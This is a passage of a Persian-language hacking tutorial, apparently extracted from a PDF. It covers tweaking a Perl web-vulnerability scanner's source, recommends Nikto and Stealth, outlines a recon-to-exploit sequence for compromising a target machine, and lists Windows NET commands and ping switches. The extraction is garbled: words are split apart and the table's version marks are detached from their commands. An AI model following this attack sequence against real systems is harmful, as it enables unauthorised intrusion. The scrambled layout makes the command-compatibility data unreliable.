‫اﻟﺒﺘﻪ ﺷﻤﺎ ﺏﺎیﺪ ﺏﻪ ﺟﺎی ‪ IIS/5.0‬ﻧﻮع ﺱﺮویﺲ دهﻨﺪﻩ را ﺡﺪس ﺏﺰیﺪ و ﺏﻌﺪ ﺏﺮﻧﺎﻣﻪ را اﺟﺮا ﮐﻨﻴ ﺪ‪ .‬ﮐ ﺎر ای ﻦ دﺱ ﺘﻮر ای ﻦ اﺱ ﺖ ﮐ ﻪ )ﻧﮑﺘ ﻪ ‪ :‬ﺕﻤ ﺎم ﺧ ﻮرﻩ‬ ‫هﺎی ‪ Deific‬ﺡﺘﻤﺎ ﻣﻴﺪاﻧﻨﺪ ﮐﻪ ﺱﺮویﺲ " ﺏﻴﻠﯽ " ﺟﻮن از ی ﮏ ﻣﮑ ﺎﻧﻴﺰﻣﯽ اﺱ ﺘﻔﺎدﻩ ﻣﻴﮑﻨ ﺪ ﮐ ﻪ ﺧ ﻮدش را ﺟ ﺎی ﻣ ﺪل ه ﺎی دیﮕ ﻪ ﺟ ﺎ ﻣﻴﺰﻧ ﺪ!! ( ﺏ ﺪون‬ ‫ﺕﻮﺟﻪ ﺏﻪ ﻧﻮع ﺱﺮویﺲ دهﻨﺪﻩ اﻧﻮاع ﺏﺮﺱﯽ هﺎی ﺧﺎص ﻣﺪل ‪ IIS/5.0‬را اﻧﺠﺎم ﻣﻴﺪهﺪ‪.‬‬ ‫ﺏﺮای ﺏﻬﺒﻮد ایﻦ ﮐﺎر ﺏﻬﺘﺮ اﺱﺖ در ﮐﺪ ﻣﻨﺒﻊ ایﻦ ﻧﺮم اﻓﺰار ﺏﻌﺪ از دو ﺧﻂ زیﺮ‪:‬‬ ‫; " ) ‪$ D { ` XXServerAgent ` } = " mozilla/5.0 [EN] (Win95; U‬‬ ‫; ) }‪$ D { ` XXForce ` } = 1 if defined ( $args {f‬‬ ‫ﺧﻂ زیﺮ را درج ﮐﻨﻴﺪ ‪:‬‬ ‫; ) }‪$ D { ` XXForceS ` } =1 if defined ( $args {S‬‬ ‫ﺧﻮب اﺧﺮیﻦ ﻧﮑﺘﻪ ایﻦ اﺱﺖ ﮐﻪ اﮔﺮ اﺡﺘﻴﺎﺟﯽ ﺏﻪ ﮐﻠﻤﻪ ﻋﺒﻮر ﺏﻮد یﮏ ﺱﻮیﭻ ‪ –a‬را ﻧﻮﺷﺘﻪ ﺏﻌﺪ " ‪ " username:password‬ایﻦ ﺷﮑﻠﯽ ﮐﻠﻤ ﻪ ﻋﺒ ﻮر‬ ‫و ﻧﺎم ﮐﺎرﺏﺮی را وارد ﻣﻴﮑﻨﻴﻢ ‪.‬‬ ‫ﺧﻮب ایﻦ از ایﻦ ‪ ،‬ﺏﺮﻧﺎﻣﻪ هﺎی ﺧﻔﻦ ایﻦ ﮐﺎرﻩ ﺏﻪ ﻏﻴﺮ از ایﻦ ﺏﺮﻧﺎﻣ ﻪ ﮐ ﻪ ﻣﻌﺮﻓ ﯽ ﮐ ﺮدم ﻣﻴ ﺸﻮد ﺏ ﻪ ‪ Nikto‬ﮐ ﻪ ﻧ ﺴﺨﻪ ﺁن ﺏ ﺮای هﻤ ﻪ ﺱﻴ ﺴﺘﻢ ﻋﺎﻣﻠﻬ ﺎ‬ ‫ﻧﻮﺷﺘﻪ ﺷﺪﻩ اﺱﺖ ﻧﺎم ﺏﺮد‪ .‬ایﻦ هﻢ ﺕﺤﺖ زﺏﺎن ‪ Perl‬ﻧﻮﺷﺘﻪ ﺷﺪﻩ و یﮏ ﻣﻔﺴﺮ ﺏﺮای ویﻨﺪوز ﻻزم دارد‪ .‬ایﻦ هﻢ ﻣﺜﻞ ﺏ ﺎﻻی اﺱ ﺖ ﺕﻮﺽ ﻴﺤﺎت اش را ﺏ ﻪ‬ ‫ﺧﻮدﺕﺎن واﮔﺬار ﻣﻴﮑﻨﻢ !! ﺏﺮﻧﺎﻣﻪ ﺏﻌﺪی ﺧﻔﻨﯽ ﮐﻪ ﻣﻴﺘ ﻮاﻧﻢ ﺏ ﻪ ﺷ ﻤﺎ ﻣﻌﺮﻓ ﯽ ﮐ ﻨﻢ اﻟﺒﺘ ﻪ ﻓﻘ ﻂ ﺏ ﺮای ویﻨ ﺪوز ﺏﺮﻧﺎﻣ ﻪ ﺧﻔ ﻦ ‪ Stealth‬اﺱ ﺖ ﮐ ﻪ ی ﮏ ﻣﺤ ﻴﻂ‬ ‫ﮔﺮاﻓﻴﮑﯽ ﺱﺎدﻩ هﻢ دارد ﮐﺎر ﺏﺎ ایﻦ ﺱﺎدﻩ اﺱﺖ ﭘﺲ ﺏﻪ ﺧﻮدﺕﺎن ﻣﻴﺴﭙﺎرم ﺕﻮﺽﻴﺤﺎت ﺁن را )ﺡﺘﻤﺎ اﺱﺘﻔﺎدﻩ ﮐﻨﻴﺪ ﭼﻮن ﮐﺎرایﯽ اش ﺧﻮب( !!!‬

‫ﮔﺎم ﭼﻬﺎرم و اﻟﺒﺘﻪ ﺁﺧﺮیﻦ ﮔﺎم ‪:‬‬ ‫ﻣﺎ در ﮔﺎم اول ﺱﻌﯽ ﮐﺮدیﻢ ﺏﻔﻬﻤﻴﻢ اﺻﻼ ﻣﺎﺷﻴﻦ ﻣﻮرد ﻧﻈﺮ ﻣﺎ ﮐﺠﺎ اﺱﺖ ﭼﻪ ﺱﻴﺴﺘﻢ ﻋﺎﻣﻠﯽ دارد ﭼﻨﺪ ﺱ ﺮور دارد و ه ﺮ ﺱ ﺮویﺲ روی ﮐ ﺪام ﻣﺎﺷ ﻴﻦ‬ ‫اﺱﺖ و ﭼﻪ ﮐﺴﯽ ای ﺱﺎیﺖ را ﺙﺒﺖ ﮐﺮدﻩ ﻣﺤﺪودﻩ ﺷﺒﮑﻪ ﺁن ﮐﺪام اﺱﺖ در ﭼﻪ ﮐﺸﻮری اﺱﺖ ﻣﺎﺏﻴﻦ ﻣﺎ و ﻣﺎﺷ ﻴﻦ ه ﺪف ﭼﻨ ﺪ ﻣﺎﺷ ﻴﻦ واﺱ ﻄﻪ ﺏﺮﻗ ﺮاری‬ ‫ارﺕﺒﺎط هﺴﺘﻨﺪ ﺁیﺎ دیﻮار ﺁﺕﺸﯽ ﺏﻴﻦ ﻣﺎ و ﻣﺎﺷﻴﻦ هﺪف اﺱﺖ و ﭼﻨﺪ ﻣ ﺴﻴﺮ ی ﺎب ﺏ ﻴﻦ ﻣ ﺎ و ه ﺪف ﻗ ﺮار دارد و‪ ...‬ﮐ ﻪ ﺏﻌ ﺪ از داﻧ ﺴﺘﻦ ای ﻦ اﻃﻼﻋ ﺎت ﭘﺎی ﻪ‬ ‫ﺕﺼﻤﻴﻢ ﺧﻮد ﺏﺮای ﻣﺎﺷﻴﻦ هﺪف و ﺡﻤﻠﻪ ‪ ،‬و ﺱﻴﻄﺮﻩ ﺏﺮ ﻣﺎﺷﻴﻦ هﺪف را ﺁﻏﺎز ﻣﻴﮑﻨ ﻴﻢ ﺏ ﺮای ای ﻦ ﮐ ﺎر ﺏﻌ ﺪ از اﻧﺘﺨ ﺎب ﻣﺎﺷ ﻴﻦ ه ﺪف ﺷ ﺮوع ﺏ ﻪ ﭘ ﻮیﺶ‬ ‫ﭘﻮرت هﺎی ﺏﺎز ﮐﺮدﻩ و دﺱﺖ ﺏﻪ ﺷﻨﺎﺱﺎیﯽ ﺱﺮویﺲ ﺏﺎز ﮐﻨﻨﺪﻩ ﭘﻮرت زدﻩ ﺏﺎ ایﻦ ﮐﺎر ﻣﻴﺘﻮان اﻟﺒﺘﻪ ﺏﺮای ﺏﺎ ﺕﺠﺮﺏﻪ ه ﺎ از هﻤ ﻴﻦ ﺟ ﺎ ﻣﺮﺡﻠ ﻪ ﺡﻤﻠ ﻪ را ﺏ ﺎ‬ ‫داﻧﺴﺘﻦ ﻧﻘﻄﻪ ﺽﻌﻔﻬﺎی ﺱﺮویﺲ ﺷﺮوع ﮐﺮدﻩ اﻣﺎ ﻣﺎ ﭼﻮن ﺏﯽ ﺕﺠﺮﺏﻪ هﺴﺘﻴﻢ ﻣﺮﺡﻠﻪ ﺏﻌﺪ را اﻧﺠﺎم ﻣﻴﺪهﻴﻢ ﺏﺎ ایﻦ ﮐﺎر ﻧﻘﺎط ﺽﻌﻒ و اﺱﻴﺐ ﭘ ﺬیﺮ ﻣﺎﺷ ﻴﻦ‬ ‫ه ﺪف ﺷﻨﺎﺱ ﺎیﯽ ﺷ ﺪﻩ و ﻣ ﺎ ﺏ ﻪ ﺱ ﺮاغ ﻣﻄﺎﻟ ﺐ ﺁﻣﻮزﻧ ﺪﻩ در ﺏ ﺎرﻩ ﺁن رﻓﺘ ﻪ و ﺏ ﺮای ﺁن ه ﻢ اﮔ ﺮ ﺏﺮﻧﺎﻣ ﻪ ﻧ ﻮیﺲ ه ﺴﺘﻴﻢ ی ﮏ ﺏﺮﻧﺎﻣ ﻪ ﮐ ﺎرﺏﺮدی ﻣﻴﻨﻮی ﺴﻢ‬ ‫)‪ (Exploit‬و ﮔﺮﻧﻪ دﻧﺒﺎل ﺏﺮﻧﺎﻣﻪ ﮐﺎرﺏﺮدی ﺏ ﺮای ﺏﻬ ﺮﻩ ﺏ ﺮداری از ﺁن ﺡﻔ ﺮﻩ ﻣﻴﮕ ﺮدیﻢ‪ .‬ﺱ ﭙﺲ ﺏﻌ ﺪ از ای ﻦ ﻣﺮﺡﻠ ﻪ ﺏ ﺎ ﺕﻮﺟ ﻪ ﺏ ﻪ ﺏﺮﻧﺎﻣ ﻪ ﮐ ﺎرﺏﺮدی و‬ ‫ﻣﻄﺎﻟﺒﯽ ﮐﻪ ﻣﻄﺎﻟﻌﻪ ردﻩ ایﻦ در ایﻦ ﺏﺎرﻩ ﺡﻤﻠﻪ را ﺕﺪارک دیﺪﻩ و ﮐﺎر را ﺕﻤﺎم ﻣﻴﮑﻨﻴﻢ‪.‬‬ ‫ﺧﻮب ایﻦ هﻢ از ﮔﺎم ﭼﻬﺎرم و ﺁﺧﺮیﻦ ﮔﺎم از ایﻦ ﺏﻪ ﺏﻌﺪ ﺏﻪ ﻣﻌﺮﻓﯽ ﻧﺮم اﻓﺰار هﺎی ﮐﺎرﺏﺮدی ﻣﺘﻔﺮﻗﻪ اﻣﺎ ﮐﺎﻣﻼ ﻣﺮﺕﺒﻂ ﺏﺎ ایﻦ ﻣﻘﻮﻟﻪ ﻣﻴﭙﺮدازم ‪.‬‬ ‫ﺿﻤﻴﻤﻪ اول ؛ ﺁﻣﻮزش ﺏﺮﻧﺎﻣﻪ هﺎی ﻣﺮﺏﻮط ﺏﻪ ﺷﺒﮑﻪ در داﺧﻞ ویﻨﺪوز ‪:‬‬ ‫دﺱﺘﻮرهﺎی ‪: NET‬‬ ‫ﮐﻪ ﺕﻤﺎم ﻓﺮﻣﺎن هﺎی ﺁن را ﺕﻮﺽﻴﺢ دادم در ﺟﺪول ؛ اﻟﺒﺘﻪ ﻗﺎﺏﻠﻴﺖ اﺟﺮای ﺁن ﻓﺮﻣ ﺎن را در ﻧ ﺴﺨﻪ ه ﺎیﯽ ویﻨ ﺪوز ﻧ ﺸﺎن دادﻩ ام )ﻧﺒ ﻮد ﻋﻼﻣ ﺖ ﻧ ﺸﺎن ﻧ ﺎ‬ ‫ﺕﻮاﻧﺎیﯽ ﺏﺮای اﺟﺮا ﺏﺮای ﺁن ﻧﺴﺨﻪ اﺱﺖ ( ‪:‬‬ ‫‪١‬‬

‫ﻋﻨﻮان ﻓﺮﻣﺎن‬ ‫‪Net accounts‬‬

‫‪٢‬‬

‫‪Net computer‬‬

‫‪٣‬‬

‫‪Net config‬‬

‫‪۴‬‬

‫‪Net continue‬‬

‫‪۵‬‬

‫‪Net diag‬‬

‫‪۶‬‬

‫‪Net file‬‬

‫‪XP‬‬

‫‪2000‬‬

‫‪ME‬‬

‫‪NT‬‬

‫‪9x‬‬

‫‪Җ‬‬

‫‪Җ‬‬

‫–‬

‫‪Җ‬‬

‫–‬

‫‪Җ‬‬ ‫‪Җ‬‬ ‫‪Җ‬‬ ‫–‬ ‫‪Җ‬‬

‫‪Җ‬‬ ‫‪Җ‬‬ ‫‪Җ‬‬ ‫–‬ ‫‪Җ‬‬

‫–‬ ‫‪Җ‬‬ ‫–‬ ‫‪Җ‬‬ ‫–‬

‫‪Җ‬‬ ‫‪Җ‬‬ ‫‪Җ‬‬ ‫–‬ ‫‪Җ‬‬

‫–‬ ‫‪Җ‬‬ ‫–‬ ‫‪Җ‬‬ ‫–‬

‫ﺕﻮﺽﻴﺢ ﻋﻤﻠﮑﺮد ﻓﺮﻣﺎن‬ ‫ﺕﻨﻈﻴﻤﺎت و ﺱﻴﺎﺱﺘﻬﺎی هﻤﻪ ﻧﺎﻣﻬﺎی ﮐﺎرﺏﺮی یﮏ رایﺎﻧﻪ یﺎ داﻣﻨﻪ‬ ‫ﺧﺎص را ﭘﻴﮑﺮ ﺏﻨﺪی ﻣﻴﮑﻨﺪ‪.‬‬ ‫از داﻣﻨﻪ ﺟﺎری رایﺎﻧﻪ هﺎ را ﺡﺬف یﺎ اﺽﺎﻓﻪ ﻣﻴﮑﻨﺪ‪.‬‬ ‫اﻃﻼﻋﺎت ﺱﺮویﺲ ﮔﻴﺮﻧﺪﻩ ﺷﺒﮑﻪ را ﻧﻤﺎیﺶ ﻣﻴﺪهﺪ‪.‬‬ ‫راﻩ اﻧﺪازی یﮏ ﺱﺮویﺲ ﺕﻌﻠﻴﻖ ﺷﺪﻩ‪.‬‬ ‫ﻧﻤﺎیﺶ اﻃﻼﻋﺎت ﻣﻔﻴﺪی درﺏﺎرﻩ ﺱﺨﺖ اﻓﺰار اﺕﺼﺎﻻت ﺷﺒﮑﻪ‪.‬‬ ‫ﻓﺎیﻠﻬﺎی ﻣﺸﺘﺮک ﺏﻴﻦ ﮐﺎرﺏﺮان ﺷﺒﮑﻪ را ﺏﻪ ﻧﻤﺎیﺶ در ﻣﯽ ﺁورد و‬ ‫ﻣﻴﺒﻨﺪد ‪ ،‬و ﻗﻔﻞ ﻓﺎیﻞ هﺎ را ﺏﺮ ﻣﯽ دارد‪.‬‬

‫آﻣﻮزش ﻫﮏ و ﻣﻌﺮﻓﯽ ﻧﺮم اﻓﺰار ﻫﺎی ﻣﺮﺑﻮﻃﻪ ﺗﻮﺳﻂ ﺧﻮدم !!‬ ‫‪٧‬‬

‫‪Net group‬‬

‫‪Җ‬‬

‫‪Җ‬‬

‫–‬

‫‪Җ‬‬

‫–‬

‫‪٨‬‬

‫‪Net help‬‬

‫‪Җ‬‬

‫‪Җ‬‬

‫‪Җ‬‬

‫‪Җ‬‬

‫‪Җ‬‬

‫‪٩‬‬

‫‪Net helpmsg‬‬

‫‪Җ‬‬

‫‪Җ‬‬

‫–‬

‫‪Җ‬‬

‫–‬

‫‪١٠‬‬

‫‪Net init‬‬

‫–‬

‫–‬

‫‪Җ‬‬

‫–‬

‫‪Җ‬‬

‫‪١١‬‬

‫‪Net localgroup‬‬

‫‪Җ‬‬

‫‪Җ‬‬

‫–‬

‫‪Җ‬‬

‫–‬

‫‪١٢‬‬

‫‪Net name‬‬

‫‪١٣‬‬

‫‪Net logoff‬‬

‫‪١۴‬‬

‫‪Net logon‬‬

‫‪١۵‬‬

‫‪Net password‬‬

‫‪١۶‬‬

‫‪Net pause‬‬

‫‪١٧‬‬

‫‪Net print‬‬

‫‪Җ‬‬ ‫–‬ ‫–‬ ‫–‬ ‫‪Җ‬‬ ‫‪Җ‬‬

‫‪Җ‬‬ ‫–‬ ‫–‬ ‫–‬ ‫‪Җ‬‬ ‫‪Җ‬‬

‫–‬ ‫‪Җ‬‬ ‫‪Җ‬‬ ‫‪Җ‬‬ ‫–‬ ‫‪Җ‬‬

‫‪Җ‬‬ ‫–‬ ‫–‬ ‫–‬ ‫‪Җ‬‬ ‫‪Җ‬‬

‫–‬ ‫‪Җ‬‬ ‫‪Җ‬‬ ‫‪Җ‬‬ ‫–‬ ‫‪Җ‬‬

‫‪١٨‬‬

‫‪Net send‬‬

‫‪١٩‬‬

‫‪Net session‬‬

‫‪Җ‬‬ ‫‪Җ‬‬

‫‪Җ‬‬ ‫‪Җ‬‬

‫–‬ ‫–‬

‫‪Җ‬‬ ‫‪Җ‬‬

‫–‬ ‫–‬

‫‪٢٠‬‬

‫‪Net share‬‬

‫‪٢١‬‬

‫‪Net start‬‬

‫‪٢٢‬‬

‫‪Net statistics‬‬

‫‪٢٣‬‬

‫‪Net stop‬‬

‫‪٢۴‬‬

‫‪Net time‬‬

‫‪Җ‬‬ ‫‪Җ‬‬ ‫‪Җ‬‬ ‫‪Җ‬‬ ‫‪Җ‬‬

‫‪Җ‬‬ ‫‪Җ‬‬ ‫‪Җ‬‬ ‫‪Җ‬‬ ‫‪Җ‬‬

‫–‬ ‫‪Җ‬‬ ‫–‬ ‫‪Җ‬‬ ‫‪Җ‬‬

‫‪Җ‬‬ ‫‪Җ‬‬ ‫‪Җ‬‬ ‫‪Җ‬‬ ‫‪Җ‬‬

‫–‬ ‫‪Җ‬‬ ‫–‬ ‫‪Җ‬‬ ‫‪Җ‬‬

‫‪٢۵‬‬

‫‪Net use‬‬

‫‪Җ‬‬

‫‪Җ‬‬

‫‪Җ‬‬

‫‪Җ‬‬

‫‪Җ‬‬

‫‪٢۶‬‬

‫‪Net user‬‬

‫‪Җ‬‬

‫‪Җ‬‬

‫–‬

‫‪Җ‬‬

‫–‬

‫‪٢٧‬‬

‫‪Net ver‬‬

‫‪٢٨‬‬

‫‪Net view‬‬

‫–‬ ‫‪Җ‬‬

‫–‬ ‫‪Җ‬‬

‫‪Җ‬‬ ‫‪Җ‬‬

‫–‬ ‫‪Җ‬‬

‫‪Җ‬‬ ‫‪Җ‬‬

‫ﺻﻔﺤﻪ‬

‫‪٥٦‬‬

‫ﮔﺮوهﺎی ﺱﺮاﺱﺮی ایﺠﺎد یﺎ ﺡﺬف ﻣﯽ ﮐﻨﺪ و ﮐﺎرﺏﺮان را ﺏﺎ ﺁن‬ ‫ﮔﺮوﻩ هﺎ اﺽﺎﻓﻪ ‪ ،‬یﺎ از ﺁن ﺡﺬف ﻣﻴﮑﻨﺪ‪.‬‬ ‫اﻃﻼﻋﺎت ﮐﻤﮑﯽ در ﺏﺎرﻩ زیﺮ ﻓﺮﻣﺎن ‪ NET‬ﺧﺎص را ﺏﻪ ﻧﻤﺎیﺶ‬ ‫در ﻣﯽ ﺁورد‪.‬‬ ‫درﺏﺎرﻩ یﮏ ﮐﺪ ﺧﻄﺎی ﭼﻬﺎر رﻗﻤﯽ ﺧﺎص اﻃﻼﻋﺎت اﺽﺎﻓﯽ ﺏﻪ‬ ‫ﻧﻤﺎیﺶ در ﻣﯽ ﺁورد‪.‬‬ ‫ﺏﺎرﮔﺬاری درایﻮرهﺎی ﻣﺮﺏﻮط ﺏﻪ ﭘﺮوﺕﮑﻞ و ﮐﺎرت ﺷﺒﮑﻪ ﻣﻮرد‬ ‫اﺱﺘﻔﺎدﻩ ﺏﺪون ﺏﻬﺮﻩ ﮔﻴﺮی از ﺏﺮﻧﺎﻣﻪ ‪Windows Protocol‬‬ ‫‪. Manager‬‬ ‫ﮔﺮوهﺎی ﻣﺤﻠﯽ ایﺠﺎد ﻣﻴﮑﻨﺪ و ﮐﺎرﺏﺮان را ﺏﻪ ﺁن اﺽﺎﻓﻪ یﺎ از ﺁﻧﻬﺎ‬ ‫ﺡﺬف ﻣﯽ ﮐﻨﺪ‪.‬‬ ‫ﺕﻌﺮیﻒ ﻧﺎم ﻣﺴﺘﻌﺎر ﺟﺪیﺪی ﺏﺮای ارﺱﺎل ﭘﻴﻐﺎم ‪.‬‬ ‫ﺧﺎﺕﻤﻪ ﺟﻠﺴﻪ ﻣﺎﺏﻴﻦ رایﺎﻧﻪ ﺡﺎﺽﺮ و رایﺎﻧﻪ ﺡﺎوی ﻣﻨﺎﺏﻊ ﻣﺸﺘﺮک‪.‬‬ ‫اﺕﺼﺎل ﺏﻪ ﺡﻮزﻩ یﺎ ﮔﺮوﻩ ﮐﺎری ﻣﻮرد ﻧﻈﺮ ‪.‬‬ ‫ﺕﻐﻴﻴﺮ ﮐﻠﻤﻪ ﻋﺒﻮر ﮐﺎرﺏﺮی از ﺷﺒﮑﻪ‪.‬‬ ‫ﺕﻌﻠﻴﻖ یﮏ ﺱﺮویﺲ در ﺡﺎل اﺟﺮا‪.‬‬ ‫دﺱﺘﻴﺎﺏﯽ ﺏﻪ اﻃﻼﻋﺎﺕﯽ در ﻣﻮرد وﺽﻌﻴﺖ ﺻﻒ ﻣﺮﺏﻮط ﺏﻪ ﭼﺎﭘﮕﺮ‬ ‫ﻣﺘﺼﻞ ﺏﻪ یﮏ رایﺎﻧﻪ ﺧﺎص و ﮐﻨﺘﺮل ﺁن ‪.‬‬ ‫ارﺱﺎل ﭘﻴﻐﺎم ﺏﻪ ﮐﺎرﺏﺮ یﺎ ﮐﺎﻣﭙﻴﻮﺕﺮ دیﮕﺮی ﺏﺮ روی ﺷﺒﮑﻪ‪.‬‬ ‫ﻧﻤﺎیﺶ و یﺎ ﺧﺎﺕﻤﻪ ﺟﻠﺴﺎت ﻣﺎ ﺏﻴﻦ رایﺎﻧﻪ ﺡﺎﺽﺮ و ﺱﺎیﺮ رایﺎﻧﻪ هﺎی‬ ‫ﻣﻮﺟﺪ در ﺷﺒﮑﻪ‪.‬‬ ‫ایﺠﺎد ‪ ،‬ﺡﺬف و ﻧﻤﺎیﺶ یﮏ ﻣﻨﺒﻊ ﻣﺸﺘﺮک ‪.‬‬ ‫راﻩ اﻧﺪازی یﮏ ﺱﺮویﺲ ﺧﺎص‪.‬‬ ‫ﻧﻤﺎیﺶ ﺁﻣﺎری درﺏﺎرﻩ یﮏ ﺱﺮور یﺎ ایﺴﺘﮕﺎﻩ ﮐﺎری‪.‬‬ ‫ﺕﻮﻗﻒ یﮏ ﺱﺮویﺲ ﺧﺎص‪.‬‬ ‫ﻧﻤﺎیﺶ زﻣﺎن ﺟﺎری یﺎ ﺕﻨﻈﻴﻢ زﻣﺎن ﺏﺎ ﺱﺮوری ﺕﺤﺖ ﻋﻨﻮان ‪time‬‬ ‫‪ server‬ﭘﻮرت ‪ ١٣‬ﮐﻪ ﺏﻪ هﻤﻴﻦ ﻣﻨﻈﻮر ﺕﺪارک دیﺪﻩ ﺷﺪﻩ اﺱﺖ‪.‬‬ ‫اﺕﺼﺎل یﺎ ﻗﻄﻊ اﺕﺼﺎل از یﮏ ﺱﻴﺴﺘﻢ ﺡﺎوی ﻣﻨﺒﻊ ﻣﺸﺘﺮک ؛ ﻧﻤﺎیﺶ‬ ‫اﻃﻼﻋﺎت در ﻣﻮرد ﻣﻨﺒﻊ ﻣﺸﺘﺮک‪.‬‬ ‫ﺡﺬف یﺎ اﺽﺎﻓﻪ یﮏ ﺡﺴﺎب ﮐﺎرﺏﺮدی از ﻟﻴﺴﺖ ﮐﺎرﺏﺮان ﻣﻮﺟﺪ در‬ ‫ﺷﺒﮑﻪ‪.‬‬ ‫ﻧﻤﺎیﺶ ﻧﺴﺨﻪ ﻣﻮر اﺱﺘﻔﺎدﻩ از ‪. Workgroup redirector‬‬ ‫ﻧﻤﺎیﺶ ﻟﻴﺴﺘﯽ از ﻣﻨﺎﺏﻊ ﻣﺸﺘﺮک ﻣﻮﺟﺪ ﺏﺮ روی یﮏ رایﺎﻧﻪ ﺧﺎص یﺎ‬ ‫ﺕﻤﺎم رایﺎﻧﻪ هﺎ ی ﻣﻮﺟﺪ در یﮏ زیﺮ ﺷﺒﮑﻪ ) اﺻﻄﻼﺡﺎ ‪( sub net‬‬

‫ﺧﻮب ایﻦ هﻢ از ایﻦ !!! ﻣﻦ ﻓﻘﻂ ﮐﺎر دﺱﺘﻮرهﺎ را ﮔﻔﺘﻢ ﮐﺎرﺏﺮد ﺕﮏ ﺕﮏ ﺁﻧﻬﺎ ﺏﺎ ﺧﻮدﺕﺎن !!!‬ ‫دﺱﺘﻮر ‪: Ping‬‬ ‫ایﻦ دﺱﺘﻮر ﺏﺮای ﺕﺸﺨﻴﺺ ﺏﺎﻻ ) ﻓﻌﺎل ﺏﻮدن ﻣﺎﺷﻴﻦ( یﺎ ﭘﺎیﻴﻦ ﺏﻮدن یﮏ ﻣﺎﺷﻴﻦ اﺱﺖ ‪ .‬اﻟﺒﺘﻪ ﻣﻴﺸﻮد ‪ IP‬یﮏ ﺱﺎیﺖ را ﺏﺎ ایﻦ دﺱﺘﻮر ﺏﺪﺱ ﺖ ﺁورد اﻟﺒﺘ ﻪ‬ ‫زیﺎد ﺟﺎﻟﺐ ﻧﻴﺴﺖ ) ﻣﻌﻤﻮﻻ ﺷﻤﺎرﻩ ‪ IP‬ﻣﺎﺷﻴﻦ ﺱﺮویﺲ دهﻨﺪﻩ وب را ﻣﻴﺪهﺪ ( ﮐﻪ ﺁدرس ﺱﺎیﺖ را ﻧﻮﺷﺖ و ‪ IP‬ﺱﺎیﺖ را ﮐﺸﻒ ﮐﺮد !!‬ ‫دارای یﮏ ﺱﺮی ﺱﻮیﭻ اﺱﺖ ﮐﻪ ﺕﻮﺽﻴﺤﺎت ﺁن را ﻣﺸﺎهﺪﻩ ﻣﻴﮑﻨﻴﺪ‪.‬‬ ‫ﺱﻮیﭻ ‪ : –t‬ﺁﻧﻘﺪر ﻣﻘﺼﺪ را ﭘﻴﻨﮓ ﻣﻴﮑﻨﺪ ﺕﺎ ﺷﻤﺎ ﺕﺎ ایﻨﮑﻪ ﺷﻤﺎ دﺱﺘﻮر ﺕﻮﻗﻒ را ﺻﺎدر ﮐﻨﻴﺪ ‪.‬‬ ‫ﺱﻮیﭻ ‪ : –a‬ﺁدرس ‪ IP‬ﻣﻘﺼﺪ را ﺏﻪ اﺱﻢ ﻣﻴﺰﺏﺎن ﺕﺒﺪیﻞ ﻣﻴﮑﻨﺪ‪.‬‬ ‫ﺱﻮیﭻ ‪ : –n‬ﺕﻌﺪاد ﺏﺴﺘﻪ هﺎیﯽ را ﮐﻪ ﻓﺮﺱﺘﺎدﻩ ﻣﻴﺸﻮد ﻣﺸﺨﺺ ﻣﻴﮑﻨﺪ‪.‬‬

‫آﻣﻮزش ﻫﮏ و ﻣﻌﺮﻓﯽ ﻧﺮم اﻓﺰار ﻫﺎی ﻣﺮﺑﻮﻃﻪ ﺗﻮﺳﻂ ﺧﻮدم !!‬

‫ﺻﻔﺤﻪ‬

‫‪٥٧‬‬

‫ﺱﻮیﭻ ‪ : –l‬اﻧﺪازﻩ ﺏﺴﺘﻪ هﺎیﯽ را ﮐﻪ ﻓﺮﺱﺘﺎدﻩ ﻣﻴﺸﻮد ﻣﺸﺨﺺ ﻣﻴﮑﻨﺪ‪.‬‬ ‫ﺱﻮیﭻ ‪ : –f‬در ﺏﺴﺘﻪ هﺎی ﮐﻪ ﻓﺮﺱﺘﺎدﻩ ﻣﻴﺸﻮد ﭘﺮﭼﻢ ‪ IP Do not Fragment‬را یﮏ ﻗﺮار ﻣﻴﺪهﺪ‪.‬‬ ‫ﺱﻮیﭻ ‪ : –i‬در ﺏﺴﺘﻪ هﺎیﯽ ﮐﻪ ﻓﺮﺱﺘﺎدﻩ ﻣﻴﺸﻮد ﻣﻘﺪار ‪ TTL‬را ﻣﺸﺨﺺ ﻣﻴﮑﻨﺪ‪) .‬ﺏﺎ ﻋﺒﻮر ﺏﺴﺘﻪ ﺷ ﻤﺎ از ه ﺮ ﻣﺎﺷ ﻴﻦ ی ﮏ واﺡ ﺪ از ﺁن ﮐ ﻢ ﻣﻴ ﺸﻮد و در‬ ‫ﺻﻮرت ﺻﻔﺮ ﺷﺪن ایﻦ ﭘﺎراﻣﺘﺮ ﺡﺬف ﻣﻴﺸﻮد ﺏﺴﺘﻪ ﺷﻤﺎ ؛ ﮐﻪ ﺏﺎ ایﻦ ﻣﮑﺎﻧﻴﺰم ﻓﺮﻣﺎن ‪ tracert.exe‬ﮐ ﺎر ﻣﻴﮑﻨ ﺪ ﺏ ﺮای ﮐ ﺸﻒ ﺕﻌ ﺪاد ﻣﺎﺷ ﻴﻨﻬﺎی ﺷ ﻤﺎ و‬ ‫ﻣﻘﺼﺪ ﻣﻮر ﻧﻈﺮﺕﺎن(‪.‬‬ ‫ﺱﻮیﭻ ‪ : –v‬ﻣﻘﺪار ‪ IP Type of Service‬را ﺏﺮای ﺏﺴﺘﻪ هﺎی ‪ Echo Request‬ﻣﺸﺨﺺ ﻣﻴﮑﻨﺪ‪.‬‬ ‫ﺱﻮیﭻ ‪ : –r‬ﺁدرس ‪ IP‬ﻣﺴﻴﺮیﺎب هﺎ را ﺏﺮای ﺕﻌﺪاد هﺎپ ﻣﺸﺨﺺ ﺷﺪﻩ ﺙﺒﺖ ﻣﻴﮑﻨﺪ‪.‬‬ ‫ﺱﻮیﭻ ‪ : –s‬ﻣﻬﺮ زﻣﺎﻧﯽ ﻣﺴﻴﺮیﺎب هﺎ را ﺏﺮای ﺕﻌﺪاد هﺎپ ﻣﺸﺨﺺ ﺷﺪﻩ ﺙﺒﺖ ﻣﻴﮑﻨﺪ‪.‬‬ ‫ﺱﻮیﭻ ‪ : –j‬ﻓﻬﺮﺱﺖ ﺏﺮﺧﯽ از ﻣﺴﻴﺮیﺎب هﺎ را ﮐﻪ ﺏﺴﺘﻪ هﺎ ﺏﺎیﺪ از ﺁن اﺱﺘﻔﺎدﻩ ﮐﻨﻨﺪ را ﻣﺸﺨﺺ ﻣﯽ ﮐﻨﺪ‪.‬‬ ‫ﺱﻮیﭻ ‪ : –k‬ﻓﻬﺮﺱﺖ ﮐﻞ ﻣﺴﻴﺮیﺎب هﺎ را ﮐﻪ ﺏﺴﺘﻪ هﺎ ﺏﺎیﺪ از ﺁﻧﻬﺎ 